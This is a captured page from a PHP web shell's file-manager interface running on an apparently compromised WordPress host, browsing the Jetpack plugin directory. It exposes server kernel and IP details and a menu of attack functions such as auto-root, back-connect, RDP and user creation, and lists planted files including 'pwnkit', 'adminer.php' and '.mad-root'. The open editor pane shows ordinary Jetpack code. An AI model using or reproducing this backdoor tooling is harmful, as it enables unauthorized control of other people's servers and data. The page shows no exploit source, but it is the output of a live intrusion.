Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
plugins /
jetpack /
sal /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
class.json-api-date.php
1.6
KB
-rw-r--r--
class.json-api-links.php
8.96
KB
-rw-r--r--
class.json-api-metadata.php
859
B
-rw-r--r--
class.json-api-platform-jetpac...
368
B
-rw-r--r--
class.json-api-platform.php
578
B
-rw-r--r--
class.json-api-post-base.php
20.98
KB
-rw-r--r--
class.json-api-post-jetpack.ph...
620
B
-rw-r--r--
class.json-api-site-base.php
13.4
KB
-rw-r--r--
class.json-api-site-jetpack-ba...
4.5
KB
-rw-r--r--
class.json-api-site-jetpack.ph...
3.68
KB
-rw-r--r--
class.json-api-token.php
1.71
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class.json-api-metadata.php
<?php /** * Utility classes that don't necessarily have a home yet */ class WPCOM_JSON_API_Metadata { public static function is_public( $key ) { if ( empty( $key ) ) return false; // Default whitelisted meta keys. $whitelisted_meta = array( '_thumbnail_id' ); // whitelist of metadata that can be accessed /** This filter is documented in json-endpoints/class.wpcom-json-api-post-endpoint.php */ if ( in_array( $key, apply_filters( 'rest_api_allowed_public_metadata', $whitelisted_meta ) ) ) return true; if ( 0 === strpos( $key, 'geo_' ) ) return true; if ( 0 === strpos( $key, '_wpas_' ) ) return true; return false; } public static function is_internal_only( $key ) { if ( 0 === strpos( $key, '_jetpack_') ) return true; if ( 0 === strpos( $key, '_elasticsearch_') ) return true; return false; } }
Close